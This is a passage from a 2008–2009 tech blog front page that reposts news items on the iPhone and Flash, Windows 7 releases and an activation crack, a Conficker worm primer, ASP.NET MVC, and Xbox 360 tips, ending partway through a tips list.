english | deutsch | RSS 2.0 | Atom 1.0 | CDF

Contact me: Send mail to the author(s) E-mail

My favorite Blogs

My favorite Board Games

Ultimate Boot CD

Categories on this blog

On this page

Why Apple Won't Allow Adobe Flash on iPhone
Windows Home Server - Power Pack 3 Availability
Multi-touch canvas interface exploration
Spawn Labs Is Slingbox For Video Games
Windows 7 activation already cracked with OEM volume license key
How to customize the Windows 7 logon screen
Microsoft's Windows 7 release candidate goes public
How will the April Fools' computer worm affect you?
ASP.NET MVC Official Release
Windows 7 winning the benchmark war
EncodeHD v0.71 Beta
'New Xbox Experience' Loading Time Comparison — DVD Vs. Hard Drive
10 Xbox 360 tricks Microsoft won't tell you - Essential hacks, tricks and secrets
Google TechTalk: The Xbox 360 Security System and its Weaknesses
Gmail, Yahoo, and Hotmail Routinely Abused by Spammers
Apple's MobileMe mail, Google's Gmail go dark
Security guru describes DNS flaw, says Internet Armageddon narrowly averted
First Picture of Xbox 360 'Opus' Motherboard
Future features for Xbox dashboard
More Details about 'New Xbox Experience' Game HDD Install
Video of the Moon Passing in Front of the Earth Taken From 31 Million Miles Away
Why Linux is NOT Better.com
Lusers make me laugh ver. 1
How to create a Linux distro
Understanding login failed (Error 18456) error messages in SQL Server 2005
Steve Jobs WWDC Keynote
The truth about last year's Xbox 360 recall
Firefox 3 is Still a Memory Hog
Robbie Bach Interview: No Zune Phone, No Blu-ray 360, Ads on 360, Xbox 720
Windows Search 4.0 Released to Web
Microsoft shows off "snippet" of Windows 7 at D6, reveals multi-touch support
Windows 7 Features Demo
Mass Attack FAQ
How to hack RFID-enabled credit cards for $8
Q and A with Linus Torvalds: OS X file system is complete and utter crap
Microsoft replaces Vista kernel in SP1
Select group of testers get new builds of XP SP3, Vista SP1
Contact lenses with circuits, lights a possible platform for superhuman vision
Ten Worst Technologies and Trends of 2007
Windows Mobile 6.1 and 7.0 feature big changes to compete with iPhone
Microsoft Released XNA Game Studio 2.0 - Create LIVE Games
First 6 Takes on Zune 80 (Verdict: Better Than iPod Classic?)
Rumor: WM 6.1 out in February 2008 - New interface to be introduced
The Great Double Standard
New Features Discovered in Windows XP SP3: Is It Better Than Vista?
VeriSign: DoS attack could shut down internet
Fragile Part of Xbox 360? Thermal Design Expert Investigates
Ballmer: 1b USD Xbox 360 Charge 'was Painful'
Bill Gates sees processor clock speeds to top out at 10 GHz
Ballmer gives his take on software-plus-services plan
Microsoft E3 Briefing: Halo3 SE 360, Elite Aug 24th in EU, Disney on MP, No Pricecut
Microsoft's next move? Code-name Falcon
Bundesrat winkt verschärften Hacker-Paragrafen durch
W3C: WSDL 2.0 approved
Windows Vista - 90 Day Vulnerability Report
EuroGamer Hardware Test: Xbox 360 Elite
Blockbuster's Blu-ray Endorsement Having Major Impact on HD DVD Sales
Microsoft's New Virtual Reality Apps - Evoke Blade Runner
Safari for Windows: Released and hacked in a day
Just a taste of the Photosynth Technology
TechEd notes SOA, open source
The HTC Kaiser
Video Interview with Nick Baker: Xbox 360 Architecture
Dell ends rumors, launching Latitude tablet in 2007
Is IT blocking SOA?
Microsoft Starts Banning 360s on LIVE - MS Confirms
"Live Drive" is almost here - Windows Live Folders beta
Microsoft shows off DigiDesk workstation of the future
Get All Your Digital Media on Your TV with a XBox360, PS3 or Wii
Microsoft releases major Server 2003 update
DirectX 9 vs. DirectX 10 Picture Comparison
Windows Mobile 6 SDKs Live on MSDN
Microsoft: VoIP for Enterprises - MS Office Communications Server 2007 Goes to Beta
Longhorn - Windows Server Virtualisation
PowerDVD AACS key found and AnyDVD HD adds Blu-ray Support
Microsoft Confirms 512MB MU $49.99 for XBox360, Increased XBLA Size Limit to 150MB
Windows Mobile 6 Preview
Windows Vista Feature Focus
Enthüllt: Xbox360 dank Software-Update deutlich leiser
Xbox360 To Demonstrate IPTV
Xbox 360 Wireless Receiver for Windows Available Now
Skype 3.1 beta now available
Virtual PC 2007 is now available
Understanding SOA Levels
Gates: 'Digital Decade Is Here'
MSN Soapbox goes public
Presentation: C64 vs. Xbox360 Copy Protection Scheme
Analysis: Vista's Ready Boost
Released: Windows Mobile Device Center 6 for Windows Vista
The first Windows Vista Ultimate Extras
Tools von Sysinternals als komplette Suite zum Download
Microsoft Sideshow + Interlink = SideLink Media Center Remote Control
IBM takes community approach to SOA
CES 2007 KeyNote (Video!)
Intel Robson Technology & Windows ReadyDrive + ReadyBoost
The 20 Most Innovative Products of the Year 2006
PS3 Blu Ray vs Xbox 360 HD-DVD vs DVD
HD-DVD AACS DRM Cracked?
Installing Windows XP after Vista
Map of the internet
Transcode 360 v4.6 beta for Windows Vista
Microsoft Robotics Studio Now Available to Provide Common Development Platform
XNA Game Studio Express Has Been Released!
Ecma Standard 376 – Office Open XML formats
PS3 vs. Xbox 360 - Another Developer Speaks
Microsoft “Real World" SOA Momentum
BKA-Trojaner soll private PCs durchsuchen
XNA Game Studio Express got DEMMX Awards
XBox360 HD-DVD Drive from Santa Claus
Encode360 v2.0 beta2
Don't cry for the Zune just yet
EU plagued by foreign spam
TVersity Media Server v0.9.9.1
XCM XFPS 360 Prototype Pictures
USB-Stick mit 2,8 mm Dicke sowie ReadyBoost-Unterstützung
Vista RTM Build
XCM XFPS 360 - First Picture
Sitemaps: Google, Microsoft and Yahoo are working together.
Known Folders Browser 1.0 (for Vista and Beyond)
Virtual Earth 3D
Office 2007 Released to Manufacturing
Microsoft Packaging for Vista and Office 2007 Revealed
Linux XGL

Archive

Total Posts: 305
This Year: 1
This Month: 0
This Week: 0
Comments: 1

Disclaimer
The opinions expressed herein are my own personal opinions and do not represent my employer's view in any way.

 Saturday, November 28, 2009
Saturday, November 28, 2009 10:09:58 PM UTC ( Apple | EN | internet | multimedia | tech )

Don’t hold your breath waiting for the iPhone to support Adobe’s Flash software: Apple’s terms-of-service agreement prohibits it.

Hulu_2

Although Adobe says it is working on a version of its popular Flash player for the iPhone, Apple is unlikely ever to permit it to appear in the handset’s App Store, no matter how much customers want it.

“I’m pretty skeptical that Flash could be implemented in a way that doesn’t violate the Terms of Service of the developer’s agreement,” said Bart Decrem, CEO of Tapulous, developer of the popular Tap Tap Revenge iPhone game.

Flash is Adobe’s highly popular platform for displaying interactive graphics, animations and multimedia within a browser. According to Adobe, 98 percent of desktop computers currently support Flash, which has led to its widespread use by web developers. Adobe’s recent announcement that it is working on a version of Flash for Windows Mobile has prompted speculation that an iPhone version might be coming soon. But the speculators may be waiting in vain, based on Apple’s TOS and the company’s history of tightly controlling applications for its smartphone platform.

Allowing Flash — which is a development platform of its own — would just be too dangerous for Apple, a company that enjoys exerting total dominance over its hardware and the software that runs on it. Flash has evolved from being a mere animation player into a multimedia platform capable of running applications of its own. That means Flash would open a new door for application developers to get their software onto the iPhone: Just code them in Flash and put them on a web page. In so doing, Flash would divert business from the App Store, as well as enable publishers to distribute music, videos and movies that could compete with the iTunes Store.

Apple’s well aware of these problems, which is why the company wrote a clause in its iPhone developers’ Terms of Service agreement (.pdf) that prohibits Flash from appearing on the iPhone:

“An Application may not itself install or launch other executable code by any means, including without limitation through the use of a plug-in architecture, calling other frameworks, other APIs or otherwise,” reads clause 3.3.2 of the iPhone SDK agreement, which was recently published on WikiLeaks. “No interpreted code may be downloaded and used in an Application except for code that is interpreted and run by Apple’s Published APIs and built-in interpreter(s).”

This could come as major disappointment to iPhone owners, as the lack of Flash support has been a paramount complaint about the handset since its release. No Flash means that the iPhone browser is incapable of displaying a large portion of the internet. For example, free Flash games aren’t supported, videos can’t be streamed from the vastly popular television and movie site Hulu, and websites that use Flash to render content or navigation won’t work on the iPhone.

It’s no wonder Adobe is expressing reluctance about the prospects of Flash for iPhone. The company on Monday demonstrated a version of Flash for Windows
Mobile handsets. And all that product manager Michele Turner could say about iPhone was, “We are working on Flash on the iPhone, but it is really up to Apple.”

Adam Dann, CEO of Nullriver, agrees that Flash would take away some of Apple’s control. Apple eventually banned Nullriver’s application NetShare because it violated AT&T Terms of Service agreement by turning the iPhone into a wireless modem for tethering. If Apple introduced Flash to iPhone, it’s possible Nullriver could code a Flash version of NetShare, repeating that violation, Dann said.

Dann added that the only way Flash could ever appear on the iPhone is if Adobe offered an extremely stripped-down version of the software. But even if there is a “Flash Lite” for iPhone, that just reinforces the point that the handset’s owners still will not have a true Flash experience.

And aside from taking software control away from Apple, Flash would introduce a slew of other potential headaches as well. Flash apps could hurt battery life, suck up the graphics-processing unit’s power, use an inordinate amount of memory, or potentially introduce security risks. Apple has plenty of customer complaints to address about the iPhone; the last thing it needs is to add Adobe and Flash to the pile.

In August, Britain’s Advertising Standards Authority pulled an iPhone advertisement because the commercial said, “All the parts of the internet are on the iPhone.” The lack of Flash and Java support on iPhone were enough for the ad to be deemed misleading. And it’s looking like Apple won’t be able to air that ad again.

Apple did not return phone calls for comment.

[via wired], [Download Apple iPhone SDK Agreement via wikileaks]

| Trackback | # 
 Friday, November 20, 2009
Friday, November 20, 2009 3:16:22 AM UTC ( EN | microsoft | tech )

Its nearly hear. Microsoft has officially announced that next Tuesday on the 24th of November Power Pack 3 will be available via Windows Update.

The release will be available in Chinese, English, French, German, Italian, Japanese, and Spanish and users must have Windows Home Server with Power Pack 2 already installed on their home server to receive the update.

Power Pack 3 (PP3) improves the Windows Home Server experience with both Windows 7 and Windows Media Center by providing backup and restore of computers running Windows 7, Windows 7 Libraries integration, enhancements for Windows Media Center, and better support for notebook computers.

That’s new in PP3:

  • Windows 7 Libraries integration
    When you install the Windows Home Server Connector and log on a computer running Windows 7, you can access the Windows Home Server shared folders from the Windows 7 libraries.
  • Windows 7 Action Center backup warning suppression
    After you install the Windows Home Server Connector to enable the home server backup for your computer running Windows 7, you can suppress the Action Center warning reminding you that Windows Backup has not been set up.
  • Windows 7 power settings
    You can configure your computer running Windows 7 to wake up at a scheduled backup time and then go back to sleep after the backup finishes.
  • Console support for Windows 7
    Windows 7 is properly displayed as the operating system shown in the Computers & Backup tab.
  • Windows Search
    Windows Search 4 is included to improve query search times, indexing times, and reliability. Extended Remote Discovery increases the efficiency of searching across all your libraries running Windows Search 4.  Files encrypted with EFS are now supported.
  • TV archive
    Windows Home Server can automatically archive recorded TV by moving your recordings from a Windows Media Center computer to your home server in the format of your choice.  This enables playback in the correct format for your home computers and/or portable devices.
  • Console view
    You can view information about your home server’s storage space, hard drives, backup status, and more from Windows Media Center.

Can’t wait till Tuesday, can you?

| Trackback | # 
 Wednesday, October 21, 2009
Wednesday, October 21, 2009 5:22:34 PM UTC ( EN | tech | UX )

This exploration combines ideas for more natural multi-touch hardware with a smartly simplified canvas interface:

Source: http://10gui.com

| Trackback | # 
 Tuesday, September 15, 2009
Tuesday, September 15, 2009 5:41:16 PM UTC ( EN | games | multimedia | tech | xbox )

Slingbox owners love their devices. They allow you to watch your home television content anywhere you are in the world with an Internet connection. A new startup, Spawn Labs, launching today at TechCrunch50 wants to extend that concept to video games.

But Spawn Labs offering is actually a bit more robust because it includes a social element as well. A key part to playing video games is playing them against other people. And with the Spawn HD Pro appliance, you’ll be able to do just that. Say a friend has an Xbox 360 in California and wants to play a game against you, but you’re in New York. From New York, you would simply install the Spawn Player application on your computer, and you could remotely connect to their system, to play a game.

The key to all of this is of course the Spawn HD Pro box, which will retail for $199 (available on their site today). These boxes will be able to transmit HD-quality (720p) content over the Internet to the computer on the other end. On those computers, users can play the game with an input device of their choosing.

The idea of playing popular video games over the web is a hot area right now. The two most well-known names in this field are OnLive and OTOY. But both of those are attempting to use their own servers to create a completely online experience, Spawn Labs is simply allowing you to take an existing console and transmit the content over the Internet. Of course, one potential issue with this method is that someone must be on the other end (where the console is) to make sure it has the game disc you want to play inside of it.

Eventually, the plan is to expand Spawn Labs’ technology beyond video games as well. They’d basically like to handle any and all video content over their box. Computers, other set-top boxes, and even mobile devices are all in the pipeline to be hooked up to Spawn Labs’ services.

Today, President and CEO David Wilson presented alongside QA engineer Daniel Bethke.

Expert Panel Q&A (paraphrased)

The experts: Don Dodge, Yossi Vardi, Ron Conway, George Zachary, and Jason Hirschhorn.

Q: Is it a weakness to have one game in at a time?
DW: That is something we thought about, but the direction of the industry is to have games on console’s hard drives.

Q: How do the graphics travel? And is this software on the console itself eventually?
DW: When you’re in a bandwidth constrained around, the network will downscale.

Q: So this is more targeted in the home?
DW: We’re targeting both.

Q: The bet is that customers will pay $200 for a hardware device to play games remotely. How often do players do that?
DW: Right now they can’t do it. But there is a strong desire for this. We have orders from several of the top game developers in the world for this.

Q: What kind of support?
DW: It runs any game on the supported consoles. (Xbox 360, Wii, Gabecube, PS3, etc)

Q: This also assumes the player has their controller?
DW: You don’t need one, but you can use any controller you want.

Q:  What about the handhelds?
DW: Theoretically yes, not sure yet though.

Pictures:

59650v1-max-450x450

59652v1-max-450x450

Source: http://www.techcrunch.com

| Trackback | # 
 Thursday, July 30, 2009
Thursday, July 30, 2009 7:53:58 PM UTC ( EN | microsoft | tech | windows 7 )

In less than a week since Windows 7 was released to manufacturing, the first crack for the Ultimate edition of the latest iteration of the Windows client is already available in the wild. The Windows 7 Build 6.1.7600.16385 Ultimate crack is capable of activating the high-end SKU of the operating system indefinitely. The product key comes from the only source possible, an OEM, as original equipment manufacturers are the first and for the time being the last group to receive the gold bits of the operating system from Microsoft. Together with the RTM development milestone of Windows 7, the Redmond company has also supplied OEM partners with activation product keys, one of which was extracted from a leaked OEM image of the platform.

Reports from various forums and websites (which I will not link to because they offer the proof-of-concept of the Windows 7 RTM Ultimate crack, along with the activation product key, which is illegal) indicate that the cracked client can bypass Windows genuine Advantage validation with no problems whatsoever. A Windows 7 Ultimate OEM DVD ISO from Lenovo has reportedly made the hack possible. Leaked on a Chinese forum, complete with the download links, the ISO allowed for hackers to grab the OEM-SLP (System-Locked Preinstallation) product key as well as the OEM certificate for Windows 7 RTM Ultimate via boot.wim.

The bypass designed for Windows 7 RTM involves abusing OEM activation 2.1, and in this regard the circumventing process is nothing more than an OEM hack. Via OEM activation 2.1, namely SLP 2.1, Microsoft allows OEMs to pre-activate Windows 7 for distribution preinstalled on new computers. In this context, the activation bypass process leading to the hacked Windows 7 RTM needs to be based on a BIOS (SLIC) hack first of all.

The procedure is by no means new. Hackers have managed to crack Windows Vista much in the same manner. In fact, the Windows 7 RTM Ultimate activation crack also relies on an OEM certificate from Windows Vista in order to function. At the time of this article hackers have made available in the wild SLIC 2.1 BIN harvested from computers on the market, as well as the genuine OEM certificate digitally signed by Microsoft, which automatically brings to the table the Private Key and the OEM Public Key as well as the OEMID (from SLIC in BIOS). Together with the leaked OEM SLP master product key Windows 7 can be hacked and the activation process bypassed. The result is a cracked copy of Windows 7 RTM Ultimate permanently activated.

It also seems that the crack is not limited to Lenovo machines. The activation process can also be circumvented on HP, Dell, and MSI computers according to reports. Because of the OEM product key, the crack is limited to the Ultimate edition of Windows 7 (useless for all other SKUs, Home Basic, Home Premium, Professional), but can be used on both 32-bit and 64-bit versions of the operating system.

Source: http://news.softpedia.com/

| Trackback | # 
 Tuesday, June 16, 2009
Tuesday, June 16, 2009 4:10:07 AM UTC ( EN | tech | windows 7 )

You can set a custom background for the logon screen in the release candidate and release to manufacturing versions of Windows 7, here is how it works:

To set a custom picture, place a JPG named backgroundDefault.jpg in the %windir%\system32\oobe\info\backgrounds folder. Now go to the registry and navigate to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background. There should be a DWORD value named OEMBackground (create it if it's missing). Set the value to 1 and click OK.

Now when you log off or switch users the new background picture will be displayed. No reboot is necessary.

You can also place custom files in the backgrounds folder with the name background<resolution> to have different pictures for different resolutions. For example, a 1024×768 resolution picture should be save as background1024x768.jpg.

| Trackback | # 
 Tuesday, May 05, 2009
Tuesday, May 05, 2009 8:13:17 PM UTC ( EN | microsoft | tech | windows 7 )

The near-final version of Microsoft's next operating system, Windows 7, became available late Monday to the general public.

Microsoft will collect feedback on the Windows 7 release candidate over the next few months, fixing small issues. The company allowed developers and other testers to begin downloading the release candidate last week.

[ Microsoft will let users run Windows 7 RC for more than a year. | Get the analysis and insights that only Randall C. Kennedy can provide on Windows tech in InfoWorld's Enterprise Desktop blog and Technology: Windows newsletter. And download our free Windows performance-monitoring tool. ]

Windows 7 comes nearly three years after Windows Vista, which took five years for Microsoft to engineer but was regarded by some as underwhelming. Microsoft hasn't said when the final Windows 7 version will be released, although it's rumored to be out before year's end.

Microsoft warned it is not offering technical support for the Windows 7 release candidate, so those who install it are on their own. Users should be familiar with installing an operating system from scratch, formatting a hard drive and backing up data, among other skills, Microsoft advised.

In the Windows 7 release notes, Microsoft warns of several problems that haven't been resolved, including issues with its latest Web browser, Internet Explorer 8 (IE8).

Debugging JavaScript with the developer tools in IE8 could throw up a warning that a Web site is not responding, but that warning can be ignored. Also, some Web pages may have misaligned text or missing images. Microsoft recommends clicking on the "compatibility view" button on the address bar as a fix.

Microsoft released the Windows 7 beta in Arabic and Hindi, but those languages have been replaced with French and Spanish in the release candidate. English is available for both versions.

"We needed to ensure certain features were tested for worldwide functionality, and Hindi and Arabic help us test a number of language-related features," Microsoft said.

Source: http://www.infoworld.com

| Trackback | # 
 Tuesday, March 31, 2009
Tuesday, March 31, 2009 8:16:02 PM UTC ( EN | internet | security | tech )

Remember the dire predictions surrounding the "millennium bug?" The doom-and-gloom scenarios bandied about by security analysts on how computers could act when their clocks turned to January 1, 2000?

Well, researchers are hoping that a potential April Fools' time bomb -- the Conficker.c that is supposed to hit computers on April 1 -- turns out to be equally unfounded.

But realizing that hope alone is not a prudent option, here is a primer on the worm so you can adequately prepare yourself -- and your computer.

Computer users will not know that Conficker.c has infected their machine.
Computer users will not know that Conficker.c has infected their machine.


What is Conficker.c and what do analysts fear it may do?

Conficker.c is a worm, a malicious program thought to have already infected between 5 million and 10 million computers.

Those infections haven't spawned many symptoms, but on April 1 a master computer is scheduled to gain control of these zombie machines, said Don DeBolt, director of threat research for CA, a New York-based IT and software company.

What happens on April Fools' Day is anyone's guess.

The program could delete all of the files on a person's computer, use zombie PCs -- those controlled by a master -- to overwhelm and shut down Web sites or monitor a person's keyboard strokes to collect private information like passwords or bank account information, experts said.

More likely, though, said DeBolt, the virus may try to get computer users to buy fake software or spend money on other phony products.

Experts said computer hackers largely have moved away from showboating and causing random trouble. They now usually try to make money off their viral programs

How does the Conficker.c work?

Conficker.c imbeds itself deep in the computer where it is difficult to track. The program, for instance, stops Windows from conducting automatic updates that could prevent it from causing damage.

The program's code is also written to evolve over time and its author appears to be making updates to thwart attempts to neuter the worm.

Who wrote the program?

It's unclear who wrote the program, but anti-work researchers -- a group calling itself the Conficker Cabal -- are looking for clues.

First, they know that some recent programs have come from Eastern European countries outside the jurisdiction of the European Union, said Patrick Morganelli, senior vice president of technology for Enigma Software.

Worm program authors often hide in those countries to stay out of sight from law enforcement, he said.

In a way, the Conficker Cabal is also looking for the program author's fingerprints. DeBolt said security researchers are looking through old programs to see if their programming styles are similar to that of Conficker C.

The prospects for catching the program's author are not good, Morganelli said. "Unless they open their mouth, they'll never be found," he said.

So, the most effective counter-assault simply may be damage control.

How can I tell if my computer's infected?

One quick way to see if your computer has been infected is to see if you have gotten automatic updates from Windows in March. If so, your computer likely is fine, DeBolt said.

Microsoft released a statement saying the company "is actively working with the industry to mitigate the spread of the worm."

Users who haven't gotten the latest Windows updates should go to http://safety.live.com if they fear they're infected, the company's statement says.

People who use other antivirus software should check to make sure they've received the latest updates, which also could have been disabled by Conficker.c.

How did the worm evolve?

The first version of Conficker -- strain A -- was released in late 2008. That version used 250 Web addresses -- generated daily by the system -- as the means of communication between the master computer and its zombies.

The end goal of the first line was to sell computer users fake antivirus software, said Morganelli.

Computer security experts largely patched that problem by working with the Internet Corporation for Assigned Names and Numbers to disable or buy the problematic URLs, he said.

A second variant, Conficker.b, was released in January and infected millions more machines.

The Conficker, strain C, will generate 50,000 URLs per day instead of just 250 when it becomes active, DeBolt said.

What is being done to fight Conficker?

Members are searching for the malicious software program's author and for ways to do damage control if he or she can't be stopped.

They're motivated in part by a $250,000 bounty from Microsoft.

Source: http://www.cnn.com

| Trackback | # 
 Sunday, March 22, 2009
Sunday, March 22, 2009 9:42:35 PM UTC ( coding | EN | internet | microsoft | tech )

As part of Scott Guthrie's keynote March 18th at Mix 2009, Microsoft announced the final release of ASP.NET Model View Controller (MVC). If you haven't had a chance to look at it yet, now is your chance as it's officially out of beta and into full production.

ASP.NET MVC—Why All the Hype?

In case you haven't heard, Microsoft has made it abundantly clear that ASP.NET MVC isn't designed to replace ASP.NET Webforms development. Instead, it's another option that Microsoft is making available to developers. This is similar to Microsoft's decision to allow developers to code in both Visual Basic and C# - the idea being that developers chose what best meets their needs and particular styles.

Personally, I'll never go back to WebForms, because I'm sold on the way MVC solutions give me complete control over my markup, facilitate testing, and allow greater control over URL routing while making my code much more modular (which in turn, makes it easier to manage and extend). So, while MVC development might not be for everyone, it's definitely for me, and I'm completely sold on it.

ASP. NET MVC as a Testament to Innovation at Microsoft

But what I really love the most about ASP.NET MVC (in addition to all of the time it saves me as a developer), is that it's a perfect example of some very new, and innovative, approaches that Microsoft has taken in regards to addressing business and the web in general. Once upon a time, Microsoft's approach to the web and competing products and platforms basically consisted of doing nothing more than pretending that those offerings didn't exist. You can see some examples of this mindset by visiting some parts of the Microsoft corporate site, where many pages and applications simply don't work correctly with browers other than Internet Explorer. Likewise, this mindset was also at the heart (in my opinion) of much of the complaints leveled at Microsoft for being nonconformant with industry accepted standards.

But the MVC is part of a vanguard of new products and services delivered by Microsoft  where the company seems to take an entirely different approach. Rather than simply pretending that other offerings don't exist, this approach focuses on accepting the strengths of other platforms, analyzing those strengths, rolling them into Microsoft products where applicable, and then building supporting and competing Microsoft products that developers, and IT professionals, just can't do without.

IIS 7, for example, no longer pretends that PHP doesn't exist. Instead, it fully embraces it, and is striving to provide such a powerful hosting platform for it that businesses will choose to run PHP on IIS7 given the ease of management, extensibility, and flexibility that they'll enjoy from hosting PHP on a Windows Server. And if Microsoft is able to deliver? Then businesses will be buying Windows Server licenses for their web workloads, instead of using Apache licenses. It's a bold business approach to be sure, but I much prefer this approach to meeting the competition head-on, rather than watching Microsoft merely burying its head in the sand.

What's better though, is that it appears that as Microsoft continues to take this head-on business approach, we're finally starting to see some really innovative things coming out of Redmond. And in my mind, a prime example of that innovation has been the effort and energy devoted to the creation of ASP.NET MVC functionality. As an ASPInsider, I've been able to see just how innovative the ASP.NET team working on this project has been - and how careful they've been in creating this platform in order to ensure that it really, and truly, met real-world business needs.

A further example of how this innovation and its associated paradigm shift is taking root at Microsoft is the BizSpark program, which takes a very aggressive approach at preventing start-ups from courting the LAMP stack as a cheaper alternative to the Microsoft Stack by giving them three years to use Microsoft products and licenses for free.

And, if you think that I've possibly gone off the deep-end, or imbibed a bit too much of the Microsoft Kool-Aid, make sure to check out Bill Buxton and Scott Guthrie's Keynote from Mix '09. Here’s the link: http://live.visitmix.com/. You’ll need to mouse over the player, select the Other Videos option, and select the Day1 Keynote.

Unless there's something seriously wrong with you, this keynote will get you excited about development again, and it will totally make you rethink your relationship with Microsoft. You'll also see some great examples of real-life innovation.

Getting Started with ASP.NET MVC

As for ASP.NET MVC itself, if you've been waiting for it to mature a bit before playing with it (or just haven't had the time yet), now is a great time to pull it down and try it out. It now has a brand new portal page on the www.asp.net web site itself, and there are also a number of great videos that will help you get quickly spun up on how it works, and what it does. In fact, if you'd like a very quick overview of how MVC applications work, make sure to check out Stephen Walther's new video that shows a start-to-finish MVC app.

Likewise, one of the great things about MVC development is that it's insanely extensible and lends itself very well to customizations and tweaks. I've leveraged these capabilities extensively in my own projects, and a huge resource that's helped me in doing so has been access to the actual source code for ASP.NET MVC itself - which you can peruse (or even download) from the codeplex site.

Another resource that you'll want to pay attention to if you're interested in MVC development is MVCContrib, which is an extensive suite of open-source extensions and augmentations that can be used to improve MVC development. I've also found that Phil Haack’s and Rob Conery's blogs are great resources; they document some MVC features and functionality. But more importantly, these blogs are great resources in terms of explaining why certain features are implemented as they are. The resulting transparency from those blogs helps (in my mind) play a big part in much of the innovative spirit that makes MVC and other recent releases from Microsoft so exciting and refreshing.

Source: http://www.devproconnections.com/

| Trackback | # 
 Thursday, January 29, 2009
Thursday, January 29, 2009 9:43:49 PM UTC ( EN | microsoft | tech | windows 7 )

The new OS is winning over notoriously skeptical tech bloggers and benchmarking sites. We put together a roundup of some of the results that show why Windows 7 could be faster than Vista.

The boot time and readiness of the OS has been getting the biggest plaudits from bloggers and benchmarkers, especially with its capacity to bring the computer to a functional state very quickly and to operate on less memory than Vista (the latter is largely thanks to the fact that Windows 7 doesn’t allocate video memory for non-visible Windows).

Other benchmark results are mixed, with Windows 7 beating its predecessors in some tests and lagging them in others (of course, it's still in beta, where XP and Vista are both production versions).

Here’s a sampling of some of the best results:

  • The Firing Squad has a comprehensive test of the gaming and USB performance of Windows 7 vs XP and Vista. It’s hard to draw conclusions from its test result since they’re all over the place: Windows XP, Windows Vista and Windows 7 each had their ups and downs, and there was no clear winner overall.
  • PC Games Hardware tests fewer games, but gives Windows 7 a slight edge in Far Cry 2 and Left 4 Dead. Its other tests were again a mixed bag, with some showing Windows 7 improving on Vista, and others showing it worse.
  • Infoworld has a fascinating look at multi-core database performance. The short version is that Windows 7 and Windows Vista take better advantage of multi-core systems, but Windows XP actually performs better than they do on fewer cores.
  • It’s not big on the details, but tests run by a ZDNet blogger give some major props to Windows 7. These tests cover mostly common tasks, like file copying and application starts.
  • Hot Hardware has benchmarks that give Windows 7 a significant performance advantage over Windows Vista. The gaming performance of the two was roughly equal, but the Futuremark PCMark Vantage overall result for Windows 7 was 20% higher than Windows Vista.

In a sense, it seems to gel with the ZDNet tests – that Windows 7 does well at “mundane” tasks, but doesn’t thrash the competition in gaming.

Of course, if you’re tired of looking at benchmarks and want to try Windows 7 for yourself, you can download it from here until Feb 10.

The good news is that it’s very stable – I’m running it and have yet to have a crash. It’s not that different from Vista overall, and if you’d like to know more about it without having to install it, you can also check out Atomic’s visual Windows 7 Beta Walkthrough.

Source: http://www.pcauthority.com.au/

| Trackback | # 
 Saturday, December 06, 2008
Saturday, December 06, 2008 8:58:50 AM UTC ( coolstuff | EN | multimedia | tech | xbox )

>> Dan released the first 'technology preview' release of EncodeHD to replace the Encode360(info) tool. EncodeHD is a an application to re-encode all types of video files for use on your home media player or on-the-go device. It aims to provide a simple interface with no fuss.
From dcunningham.net:


[QUOTE]
So firstly, let's talk EncodeHD. Look at the current beta release (0.71) as a 'technology preview' of sorts. The idea here is to verify that we've got the primary encoding mechanisms up to scratch. So what I'm looking for here is to make sure that video converts for all devices as expected and that the quality is good (or great).

The key things to note for EncodeHD are:

  • Outputted video is MPEG4 and H.264 with AAC (or AC3) audio, NOT WMV (this is not strictly for X-Box 360 anymore)
  • This means that 5.1 audio for the X-Box 360 is not yet supported in these formats
  • Subtitles are also not yet possible, although I'm looking into it

As of now, there's still a lot of unimplemented functionality that will be added later. If you want to see something in particular, please let me know. However, if it's going to cludge up the interface and start making things complex, I may not implement requests. We'll have to see.

One of the nice things about EncodeHD is that it has built-in bug reporting. If you hit a problem, it will ask you if you want to submit a bug report - including all the details I need to help solve the issue. If however, the problem is with video output, it may not detect any problems. In this case, could I ask you to email my bug-tracking system: cases@dcunningham.fogbugz.com, and attach the EncodeHD.Log file which you can find in your Temp folder (Click Start > Run and type %TEMP% to access it).
[/QUOTE]

Official Site: http://dcunningham.net
Download: here

| Trackback | # 
 Tuesday, November 04, 2008
Tuesday, November 04, 2008 9:09:30 PM UTC ( EN | games | microsoft | tech | xbox )

[QUOTE]

Microsoft claims that the New Xbox Experience — that big dashboard upgrade being pushed to all 360 owners on November 19 — will allow your favorite Xbox 360 games to load more quickly. To enjoy that benefit, a gamer will have to install their disc-based games onto their 360’s hard drive.

People keep asking me if doing the installation is worth the trouble. Are loading times that much better?

I tested Microsoft’s claim on four games, using my NXE-enabled 360. Above, you can watch the initial loading for “Grand Theft Auto IV,” DVD vs Hard Drive. After the jump, check out loading comparisons for “Fable II” and “Gears of War.”

(Videos not viewable by users logging in from Canada or the U.K.)

In all cases, I spammed the A button of my controller as soon as the game started loading, so you’re seeing my fastest attempts to get from the new dashboard to the new games.

Each of the games took about 11 minutes to install and required between 6.6 and 6.8GB. It shaved off about nine to 15 seconds off the initial load times.Think it’s worth it?



 

[/QUOTE]

Source: http://multiplayerblog.mtv.com

| Trackback | # 
 Saturday, September 13, 2008
Saturday, September 13, 2008 5:41:14 PM UTC ( EN | microsoft | multimedia | tech | xbox )

[QUOTE]
1. Connect your Xbox 360 to two screens at once

If you've got one of the component/composite dual video cables – the one that comes in the box with most 360s – you can have your console display its gamey goodness on two TVs simultaneously. The trick is to flick the cable's switch to Standard Definition but hook up the composite (yellow) cable to one screen and the component (the red, green, blue) cables to another. It won't be high-def, but it could be handy if you're staging a mini LAN party and want to set up a display for bored spectators to point their eyes at.

2. Play your own music in original Xbox games

That you can fire up your own MP3s during a 360 game is common knowledge (and re-soundtracking moody horror games with the Benny Hill theme tune never stops being funny), but it doesn't work if you're playing a title from the original Xbox. There's a way around it – start playing your album or playlist before you load the game, and it'll keep on playing once you do fire the title up. The game's own music won't be muted, however, so if you can't do that in its settings you'll go mad from the weird cacophony.

3. It can write its own blog

Ah, the internet – founded upon crazy men making crazy things for free. Such as a blog supposedly written by your 360, based on what you've been using it for. It monitors your Live account and automatically generates entries about what it's been up to that day (or what it hasn't been up to – expect many posts about neglect if you don't turn it on for a while). The tone is very much American geek, but it's a fun record of your own gaming habits, and of keeping an eye on what your chums are up to. Get set up atwww.360voice.com.

4. Play Xbox 360 games online for free – without a Live account

